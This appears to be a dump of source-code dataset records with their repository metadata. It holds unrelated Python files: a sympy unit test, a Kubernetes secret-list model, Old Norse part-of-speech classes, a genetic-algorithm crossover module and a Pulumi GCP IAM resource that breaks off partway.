hexsha
stringlengths
40
40
size
int64
3
1.03M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
972
max_stars_repo_name
stringlengths
6
130
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
sequencelengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
972
max_issues_repo_name
stringlengths
6
130
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
sequencelengths
1
10
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
972
max_forks_repo_name
stringlengths
6
130
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
sequencelengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
3
1.03M
avg_line_length
float64
1.13
941k
max_line_length
int64
2
941k
alphanum_fraction
float64
0
1
89928632b2aee5d553cc4a4c8e3c39d3adbe978b
1,075
py
Python
sympkf/symbolic/test/test_coordinate.py
opannekoucke/sympkf
914dbc8127f16d28b1fe2f5afe2bc0864d53d644
[ "CECILL-B" ]
null
null
null
sympkf/symbolic/test/test_coordinate.py
opannekoucke/sympkf
914dbc8127f16d28b1fe2f5afe2bc0864d53d644
[ "CECILL-B" ]
null
null
null
sympkf/symbolic/test/test_coordinate.py
opannekoucke/sympkf
914dbc8127f16d28b1fe2f5afe2bc0864d53d644
[ "CECILL-B" ]
null
null
null
import unittest from sympkf.symbolic import CoordinateSystem from sympy import symbols, Function, Matrix, Derivative class TestCoordinateSystem(unittest.TestCase): coords = CoordinateSystem(symbols('x y')) def test_compatibility(self): # Case not compatible f = Function('f')(*symbols('t x')) self.assertTrue(not self.coords.is_compatible(f)) # Case compatible f = Function('f')(*symbols('t x y')) self.assertTrue(self.coords.is_compatible(f)) def test_gradient_div(self): # Case compatible f = Function('f')(*symbols('t x y')) x, y = symbols('x y') # Computation of the gradient grad_f = self.coords.gradient(f) self.assertEqual(grad_f,Matrix([Derivative(f,x), Derivative(f,y)])) # Computation of the divergent of the gradient which should be the laplacian here div_grad_f = self.coords.div(grad_f) lap_f = Derivative(f,x,2)+Derivative(f,y,2) self.assertEqual(div_grad_f, lap_f) if __name__ == '__main__': unittest.main()
31.617647
89
0.653023
073b63d8c41de77411a8fab8e8aebe7c88f248d2
6,947
py
Python
kubernetes/client/models/v1_secret_list.py
philipp-sontag-by/python
51c481692ab0d9c71b9dd96342bfa93b721b029d
[ "Apache-2.0" ]
1
2022-02-22T23:10:55.000Z
2022-02-22T23:10:55.000Z
kubernetes/client/models/v1_secret_list.py
philipp-sontag-by/python
51c481692ab0d9c71b9dd96342bfa93b721b029d
[ "Apache-2.0" ]
6
2021-09-13T19:03:02.000Z
2022-03-16T18:56:42.000Z
kubernetes/client/models/v1_secret_list.py
philipp-sontag-by/python
51c481692ab0d9c71b9dd96342bfa93b721b029d
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 """ Kubernetes No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501 The version of the OpenAPI document: release-1.23 Generated by: https://openapi-generator.tech """ import pprint import re # noqa: F401 import six from kubernetes.client.configuration import Configuration class V1SecretList(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'api_version': 'str', 'items': 'list[V1Secret]', 'kind': 'str', 'metadata': 'V1ListMeta' } attribute_map = { 'api_version': 'apiVersion', 'items': 'items', 'kind': 'kind', 'metadata': 'metadata' } def __init__(self, api_version=None, items=None, kind=None, metadata=None, local_vars_configuration=None): # noqa: E501 """V1SecretList - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration() self.local_vars_configuration = local_vars_configuration self._api_version = None self._items = None self._kind = None self._metadata = None self.discriminator = None if api_version is not None: self.api_version = api_version self.items = items if kind is not None: self.kind = kind if metadata is not None: self.metadata = metadata @property def api_version(self): """Gets the api_version of this V1SecretList. # noqa: E501 APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501 :return: The api_version of this V1SecretList. # noqa: E501 :rtype: str """ return self._api_version @api_version.setter def api_version(self, api_version): """Sets the api_version of this V1SecretList. APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501 :param api_version: The api_version of this V1SecretList. # noqa: E501 :type: str """ self._api_version = api_version @property def items(self): """Gets the items of this V1SecretList. # noqa: E501 Items is a list of secret objects. More info: https://kubernetes.io/docs/concepts/configuration/secret # noqa: E501 :return: The items of this V1SecretList. # noqa: E501 :rtype: list[V1Secret] """ return self._items @items.setter def items(self, items): """Sets the items of this V1SecretList. Items is a list of secret objects. More info: https://kubernetes.io/docs/concepts/configuration/secret # noqa: E501 :param items: The items of this V1SecretList. # noqa: E501 :type: list[V1Secret] """ if self.local_vars_configuration.client_side_validation and items is None: # noqa: E501 raise ValueError("Invalid value for `items`, must not be `None`") # noqa: E501 self._items = items @property def kind(self): """Gets the kind of this V1SecretList. # noqa: E501 Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501 :return: The kind of this V1SecretList. # noqa: E501 :rtype: str """ return self._kind @kind.setter def kind(self, kind): """Sets the kind of this V1SecretList. Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501 :param kind: The kind of this V1SecretList. # noqa: E501 :type: str """ self._kind = kind @property def metadata(self): """Gets the metadata of this V1SecretList. # noqa: E501 :return: The metadata of this V1SecretList. # noqa: E501 :rtype: V1ListMeta """ return self._metadata @metadata.setter def metadata(self, metadata): """Sets the metadata of this V1SecretList. :param metadata: The metadata of this V1SecretList. # noqa: E501 :type: V1ListMeta """ self._metadata = metadata def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, V1SecretList): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, V1SecretList): return True return self.to_dict() != other.to_dict()
33.723301
312
0.622859
88b1b7b4ecf8d06dc108fb62bb4d20a80ff91d94
4,040
py
Python
edda/pos_utils.py
clemsciences/old_norse_notebook
4e3608e9c0fa58b164009965f95052f309b15266
[ "MIT" ]
3
2018-11-30T13:42:18.000Z
2021-04-15T22:39:31.000Z
edda/pos_utils.py
clemsciences/old_norse_notebook
4e3608e9c0fa58b164009965f95052f309b15266
[ "MIT" ]
null
null
null
edda/pos_utils.py
clemsciences/old_norse_notebook
4e3608e9c0fa58b164009965f95052f309b15266
[ "MIT" ]
null
null
null
""" """ import abc __author__ = ["Clément Besnier <clemsciences@aol.com>", ] class POSFeatures: def __init__(self): self.masculine = False self.feminine = False self.neuter = False self.singular = False self.plural = False self.dual = False self.nominative = False self.accusative = False self.dative = False self.genitive = False self.definite = False self.indefinite = False self.positive = False self.comparative = False self.superlative = False self.first = False self.second = False self.third = False self.indicative = False self.subjunctive = False self.imperative = False self.present = False self.preterite = False self.active = False self.reflexive = False self.infinitive = False self.participle = False self.strong = False self.weak = False self.reduplicating = False self.preterito_present = False self.noun = False self.proper_noun = False self.adjective = False self.article = False self.demonstrative = False self.indefinite_demonstrative = False self.possessive = False self.personal = False self.interrogative = False self.relative = False self.numeral = False self.verb = False self.adverb = False self.conjunction = False self.foreign = False self.punctuation = False self.unanalysed = False def __eq__(self, other): for i in range(len(self.vectorize())): if self.vectorize()[i] != other.vectorize()[i]: return False return True def vectorize(self): return [ self.masculine, self.feminine, self.neuter, self.singular, self.plural, self.dual, self.nominative, self.accusative, self.dative, self.genitive, self.definite, self.indefinite, self.positive, self.comparative, self.superlative, self.first, self.second, self.third, self.indicative, self.subjunctive, self.imperative, self.present, self.preterite, self.active, self.reflexive, self.infinitive, self.participle, self.strong, self.weak, self.reduplicating, self.preterito_present, self.noun, self.proper_noun, self.adjective, self.article, self.demonstrative, self.indefinite_demonstrative, self.possessive, self.personal, self.interrogative, self.relative, self.numeral, self.verb, self.adverb, self.foreign, self.punctuation, self.unanalysed ] class POSElement: @staticmethod @abc.abstractmethod def parse(tag, value): return value @staticmethod @abc.abstractmethod def binarize(tag, features): pass class POSAbstract: """ """ @staticmethod @abc.abstractmethod def apply(tag, l_pos, value): """ :param tag: :param l_pos: :param value: :return: """ pass @staticmethod @abc.abstractmethod def binarize(tag, l_pos, value): """ :param tag: POS tag :param l_pos: :param value: :return: """ pass @staticmethod @abc.abstractmethod def parse(full_tag, vector=False): """ :param full_tag: Pars oratori in annotated documents :param vector: :return: readable form of the POS tag """ pass
23.625731
60
0.52698
37f61b88032ad641c1db3f33e4a9d1320a04dab3
34
py
Python
tests/__init__.py
phzwart/qlty
701688e7cf00abfb5624042aa296099ee2e95773
[ "BSD-3-Clause" ]
null
null
null
tests/__init__.py
phzwart/qlty
701688e7cf00abfb5624042aa296099ee2e95773
[ "BSD-3-Clause" ]
null
null
null
tests/__init__.py
phzwart/qlty
701688e7cf00abfb5624042aa296099ee2e95773
[ "BSD-3-Clause" ]
null
null
null
"""Unit test package for qlty."""
17
33
0.647059
680bb718aec1426bf0c9c4c9c90f92a41b881be4
2,124
py
Python
GA_tsp_optimisation/crossover.py
JessikaSmith/OptimizationAlgorithms
bf0f871f4d6150e1e7533360cfc6f70eb616c870
[ "MIT" ]
15
2018-11-16T04:42:44.000Z
2020-03-20T16:00:47.000Z
GA_tsp_optimisation/crossover.py
JessikaSmith/OptimizationAlgorithms
bf0f871f4d6150e1e7533360cfc6f70eb616c870
[ "MIT" ]
null
null
null
GA_tsp_optimisation/crossover.py
JessikaSmith/OptimizationAlgorithms
bf0f871f4d6150e1e7533360cfc6f70eb616c870
[ "MIT" ]
3
2019-01-17T13:18:56.000Z
2019-12-17T22:22:48.000Z
import numpy as np class Crossover: def __init__(self, crossover_type, **kwargs): self.crossover_type = crossover_type def crossover(self, parent_1, parent_2, **kwargs): if self.crossover_type == 'pmx': return self.crossover_pmx(parent_1=parent_1, parent_2=parent_2) if self.crossover_type == 'ordered': return self.ordered_crossover(parent_1=parent_1, parent_2=parent_2) if self.crossover_type == 'cycle': return self.cycle_crossover(parent_1=parent_1, parent_2=parent_2) def crossover_pmx(self, parent_1, parent_2): points_num = len(parent_1) cut_ix = np.random.choice(points_num - 2, 2, replace=False) min_ix = np.min(cut_ix) max_ix = np.max(cut_ix) offspring_1 = np.zeros(points_num) def ordered_crossover(self, parent_1, parent_2): points_num = len(parent_1) cut_ix = np.random.choice(points_num - 2, 2, replace=False) min_ix = np.min(cut_ix) max_ix = np.max(cut_ix) offspring_1 = np.zeros(points_num) current_ix = 0 set_1 = parent_1[min_ix:max_ix] for i, elem in enumerate(parent_2): if elem not in set_1: if current_ix != min_ix: offspring_1[current_ix] = elem else: current_ix = max_ix offspring_1[current_ix] = elem current_ix += 1 offspring_1[min_ix:max_ix] = set_1 offspring_2 = np.zeros(points_num) current_ix = 0 set_2 = parent_2[min_ix:max_ix] for i, elem in enumerate(parent_1): if elem not in set_2: if current_ix != min_ix: offspring_2[current_ix] = elem else: current_ix = max_ix offspring_2[current_ix] = elem current_ix += 1 offspring_2[min_ix:max_ix] = set_2 return [int(i) for i in offspring_1], [int(i) for i in offspring_2] def cycle_crossover(self, parent_1, parent_2): raise NotImplementedError
37.263158
79
0.59322
4089776c4b5d23d28aa5ec3b1bddafba61a6bc9f
26,087
py
Python
sdk/python/pulumi_gcp/iap/web_iam_member.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
121
2018-06-18T19:16:42.000Z
2022-03-31T06:06:48.000Z
sdk/python/pulumi_gcp/iap/web_iam_member.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
492
2018-06-22T19:41:03.000Z
2022-03-31T15:33:53.000Z
sdk/python/pulumi_gcp/iap/web_iam_member.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
43
2018-06-19T01:43:13.000Z
2022-03-23T22:43:37.000Z
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['WebIamMemberArgs', 'WebIamMember'] @pulumi.input_type class WebIamMemberArgs: def __init__(__self__, *, member: pulumi.Input[str], role: pulumi.Input[str], condition: Optional[pulumi.Input['WebIamMemberConditionArgs']] = None, project: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a WebIamMember resource. :param pulumi.Input[str] role: The role that should be applied. Only one `iap.WebIamBinding` can be used per role. Note that custom roles must be of the format `[projects|organizations]/{parent-name}/roles/{role-name}`. :param pulumi.Input['WebIamMemberConditionArgs'] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used. """ pulumi.set(__self__, "member", member) pulumi.set(__self__, "role", role) if condition is not None: pulumi.set(__self__, "condition", condition) if project is not None: pulumi.set(__self__, "project", project) @property @pulumi.getter def member(self) -> pulumi.Input[str]: return pulumi.get(self, "member") @member.setter def member(self, value: pulumi.Input[str]): pulumi.set(self, "member", value) @property @pulumi.getter def role(self) -> pulumi.Input[str]: """ The role that should be applied. Only one `iap.WebIamBinding` can be used per role. Note that custom roles must be of the format `[projects|organizations]/{parent-name}/roles/{role-name}`. """ return pulumi.get(self, "role") @role.setter def role(self, value: pulumi.Input[str]): pulumi.set(self, "role", value) @property @pulumi.getter def condition(self) -> Optional[pulumi.Input['WebIamMemberConditionArgs']]: """ ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding. Structure is documented below. """ return pulumi.get(self, "condition") @condition.setter def condition(self, value: Optional[pulumi.Input['WebIamMemberConditionArgs']]): pulumi.set(self, "condition", value) @property @pulumi.getter def project(self) -> Optional[pulumi.Input[str]]: """ The ID of the project in which the resource belongs. If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used. """ return pulumi.get(self, "project") @project.setter def project(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "project", value) @pulumi.input_type class _WebIamMemberState: def __init__(__self__, *, condition: Optional[pulumi.Input['WebIamMemberConditionArgs']] = None, etag: Optional[pulumi.Input[str]] = None, member: Optional[pulumi.Input[str]] = None, project: Optional[pulumi.Input[str]] = None, role: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering WebIamMember resources. :param pulumi.Input['WebIamMemberConditionArgs'] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding. Structure is documented below. :param pulumi.Input[str] etag: (Computed) The etag of the IAM policy. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used. :param pulumi.Input[str] role: The role that should be applied. Only one `iap.WebIamBinding` can be used per role. Note that custom roles must be of the format `[projects|organizations]/{parent-name}/roles/{role-name}`. """ if condition is not None: pulumi.set(__self__, "condition", condition) if etag is not None: pulumi.set(__self__, "etag", etag) if member is not None: pulumi.set(__self__, "member", member) if project is not None: pulumi.set(__self__, "project", project) if role is not None: pulumi.set(__self__, "role", role) @property @pulumi.getter def condition(self) -> Optional[pulumi.Input['WebIamMemberConditionArgs']]: """ ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding. Structure is documented below. """ return pulumi.get(self, "condition") @condition.setter def condition(self, value: Optional[pulumi.Input['WebIamMemberConditionArgs']]): pulumi.set(self, "condition", value) @property @pulumi.getter def etag(self) -> Optional[pulumi.Input[str]]: """ (Computed) The etag of the IAM policy. """ return pulumi.get(self, "etag") @etag.setter def etag(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "etag", value) @property @pulumi.getter def member(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "member") @member.setter def member(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "member", value) @property @pulumi.getter def project(self) -> Optional[pulumi.Input[str]]: """ The ID of the project in which the resource belongs. If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used. """ return pulumi.get(self, "project") @project.setter def project(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "project", value) @property @pulumi.getter def role(self) -> Optional[pulumi.Input[str]]: """ The role that should be applied. Only one `iap.WebIamBinding` can be used per role. Note that custom roles must be of the format `[projects|organizations]/{parent-name}/roles/{role-name}`. """ return pulumi.get(self, "role") @role.setter def role(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "role", value) class WebIamMember(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, condition: Optional[pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']]] = None, member: Optional[pulumi.Input[str]] = None, project: Optional[pulumi.Input[str]] = None, role: Optional[pulumi.Input[str]] = None, __props__=None): """ Three different resources help you manage your IAM policy for Identity-Aware Proxy Web. Each of these resources serves a different use case: * `iap.WebIamPolicy`: Authoritative. Sets the IAM policy for the web and replaces any existing policy already attached. * `iap.WebIamBinding`: Authoritative for a given role. Updates the IAM policy to grant a role to a list of members. Other roles within the IAM policy for the web are preserved. * `iap.WebIamMember`: Non-authoritative. Updates the IAM policy to grant a role to a new member. Other members for the role for the web are preserved. > **Note:** `iap.WebIamPolicy` **cannot** be used in conjunction with `iap.WebIamBinding` and `iap.WebIamMember` or they will fight over what your policy should be. > **Note:** `iap.WebIamBinding` resources **can be** used in conjunction with `iap.WebIamMember` resources **only if** they do not grant privilege to the same role. ## google\_iap\_web\_iam\_policy ```python import pulumi import pulumi_gcp as gcp admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs( role="roles/iap.httpsResourceAccessor", members=["user:jane@example.com"], )]) policy = gcp.iap.WebIamPolicy("policy", project=google_project_service["project_service"]["project"], policy_data=admin.policy_data) ``` With IAM Conditions: ```python import pulumi import pulumi_gcp as gcp admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs( role="roles/iap.httpsResourceAccessor", members=["user:jane@example.com"], condition=gcp.organizations.GetIAMPolicyBindingConditionArgs( title="expires_after_2019_12_31", description="Expiring at midnight of 2019-12-31", expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")", ), )]) policy = gcp.iap.WebIamPolicy("policy", project=google_project_service["project_service"]["project"], policy_data=admin.policy_data) ``` ## google\_iap\_web\_iam\_binding ```python import pulumi import pulumi_gcp as gcp binding = gcp.iap.WebIamBinding("binding", project=google_project_service["project_service"]["project"], role="roles/iap.httpsResourceAccessor", members=["user:jane@example.com"]) ``` With IAM Conditions: ```python import pulumi import pulumi_gcp as gcp binding = gcp.iap.WebIamBinding("binding", project=google_project_service["project_service"]["project"], role="roles/iap.httpsResourceAccessor", members=["user:jane@example.com"], condition=gcp.iap.WebIamBindingConditionArgs( title="expires_after_2019_12_31", description="Expiring at midnight of 2019-12-31", expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")", )) ``` ## google\_iap\_web\_iam\_member ```python import pulumi import pulumi_gcp as gcp member = gcp.iap.WebIamMember("member", project=google_project_service["project_service"]["project"], role="roles/iap.httpsResourceAccessor", member="user:jane@example.com") ``` With IAM Conditions: ```python import pulumi import pulumi_gcp as gcp member = gcp.iap.WebIamMember("member", project=google_project_service["project_service"]["project"], role="roles/iap.httpsResourceAccessor", member="user:jane@example.com", condition=gcp.iap.WebIamMemberConditionArgs( title="expires_after_2019_12_31", description="Expiring at midnight of 2019-12-31", expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")", )) ``` ## Import For all import syntaxes, the "resource in question" can take any of the following forms* projects/{{project}}/iap_web * {{project}} Any variables not passed in the import command will be taken from the provider configuration. Identity-Aware Proxy web IAM resources can be imported using the resource identifiers, role, and member. IAM member imports use space-delimited identifiersthe resource in question, the role, and the member identity, e.g. ```sh $ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor user:jane@example.com" ``` IAM binding imports use space-delimited identifiersthe resource in question and the role, e.g. ```sh $ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor" ``` IAM policy imports use the identifier of the resource in question, e.g. ```sh $ pulumi import gcp:iap/webIamMember:WebIamMember editor projects/{{project}}/iap_web ``` -> **Custom Roles**If you're importing a IAM resource with a custom role, make sure to use the full name of the custom role, e.g. `[projects/my-project|organizations/my-org]/roles/my-custom-role`. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used. :param pulumi.Input[str] role: The role that should be applied. Only one `iap.WebIamBinding` can be used per role. Note that custom roles must be of the format `[projects|organizations]/{parent-name}/roles/{role-name}`. """ ... @overload def __init__(__self__, resource_name: str, args: WebIamMemberArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Three different resources help you manage your IAM policy for Identity-Aware Proxy Web. Each of these resources serves a different use case: * `iap.WebIamPolicy`: Authoritative. Sets the IAM policy for the web and replaces any existing policy already attached. * `iap.WebIamBinding`: Authoritative for a given role. Updates the IAM policy to grant a role to a list of members. Other roles within the IAM policy for the web are preserved. * `iap.WebIamMember`: Non-authoritative. Updates the IAM policy to grant a role to a new member. Other members for the role for the web are preserved. > **Note:** `iap.WebIamPolicy` **cannot** be used in conjunction with `iap.WebIamBinding` and `iap.WebIamMember` or they will fight over what your policy should be. > **Note:** `iap.WebIamBinding` resources **can be** used in conjunction with `iap.WebIamMember` resources **only if** they do not grant privilege to the same role. ## google\_iap\_web\_iam\_policy ```python import pulumi import pulumi_gcp as gcp admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs( role="roles/iap.httpsResourceAccessor", members=["user:jane@example.com"], )]) policy = gcp.iap.WebIamPolicy("policy", project=google_project_service["project_service"]["project"], policy_data=admin.policy_data) ``` With IAM Conditions: ```python import pulumi import pulumi_gcp as gcp admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs( role="roles/iap.httpsResourceAccessor", members=["user:jane@example.com"], condition=gcp.organizations.GetIAMPolicyBindingConditionArgs( title="expires_after_2019_12_31", description="Expiring at midnight of 2019-12-31", expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")", ), )]) policy = gcp.iap.WebIamPolicy("policy", project=google_project_service["project_service"]["project"], policy_data=admin.policy_data) ``` ## google\_iap\_web\_iam\_binding ```python import pulumi import pulumi_gcp as gcp binding = gcp.iap.WebIamBinding("binding", project=google_project_service["project_service"]["project"], role="roles/iap.httpsResourceAccessor", members=["user:jane@example.com"]) ``` With IAM Conditions: ```python import pulumi import pulumi_gcp as gcp binding = gcp.iap.WebIamBinding("binding", project=google_project_service["project_service"]["project"], role="roles/iap.httpsResourceAccessor", members=["user:jane@example.com"], condition=gcp.iap.WebIamBindingConditionArgs( title="expires_after_2019_12_31", description="Expiring at midnight of 2019-12-31", expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")", )) ``` ## google\_iap\_web\_iam\_member ```python import pulumi import pulumi_gcp as gcp member = gcp.iap.WebIamMember("member", project=google_project_service["project_service"]["project"], role="roles/iap.httpsResourceAccessor", member="user:jane@example.com") ``` With IAM Conditions: ```python import pulumi import pulumi_gcp as gcp member = gcp.iap.WebIamMember("member", project=google_project_service["project_service"]["project"], role="roles/iap.httpsResourceAccessor", member="user:jane@example.com", condition=gcp.iap.WebIamMemberConditionArgs( title="expires_after_2019_12_31", description="Expiring at midnight of 2019-12-31", expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")", )) ``` ## Import For all import syntaxes, the "resource in question" can take any of the following forms* projects/{{project}}/iap_web * {{project}} Any variables not passed in the import command will be taken from the provider configuration. Identity-Aware Proxy web IAM resources can be imported using the resource identifiers, role, and member. IAM member imports use space-delimited identifiersthe resource in question, the role, and the member identity, e.g. ```sh $ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor user:jane@example.com" ``` IAM binding imports use space-delimited identifiersthe resource in question and the role, e.g. ```sh $ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor" ``` IAM policy imports use the identifier of the resource in question, e.g. ```sh $ pulumi import gcp:iap/webIamMember:WebIamMember editor projects/{{project}}/iap_web ``` -> **Custom Roles**If you're importing a IAM resource with a custom role, make sure to use the full name of the custom role, e.g. `[projects/my-project|organizations/my-org]/roles/my-custom-role`. :param str resource_name: The name of the resource. :param WebIamMemberArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(WebIamMemberArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, condition: Optional[pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']]] = None, member: Optional[pulumi.Input[str]] = None, project: Optional[pulumi.Input[str]] = None, role: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = WebIamMemberArgs.__new__(WebIamMemberArgs) __props__.__dict__["condition"] = condition if member is None and not opts.urn: raise TypeError("Missing required property 'member'") __props__.__dict__["member"] = member __props__.__dict__["project"] = project if role is None and not opts.urn: raise TypeError("Missing required property 'role'") __props__.__dict__["role"] = role __props__.__dict__["etag"] = None super(WebIamMember, __self__).__init__( 'gcp:iap/webIamMember:WebIamMember', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, condition: Optional[pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']]] = None, etag: Optional[pulumi.Input[str]] = None, member: Optional[pulumi.Input[str]] = None, project: Optional[pulumi.Input[str]] = None, role: Optional[pulumi.Input[str]] = None) -> 'WebIamMember': """ Get an existing WebIamMember resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding. Structure is documented below. :param pulumi.Input[str] etag: (Computed) The etag of the IAM policy. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used. :param pulumi.Input[str] role: The role that should be applied. Only one `iap.WebIamBinding` can be used per role. Note that custom roles must be of the format `[projects|organizations]/{parent-name}/roles/{role-name}`. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _WebIamMemberState.__new__(_WebIamMemberState) __props__.__dict__["condition"] = condition __props__.__dict__["etag"] = etag __props__.__dict__["member"] = member __props__.__dict__["project"] = project __props__.__dict__["role"] = role return WebIamMember(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def condition(self) -> pulumi.Output[Optional['outputs.WebIamMemberCondition']]: """ ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding. Structure is documented below. 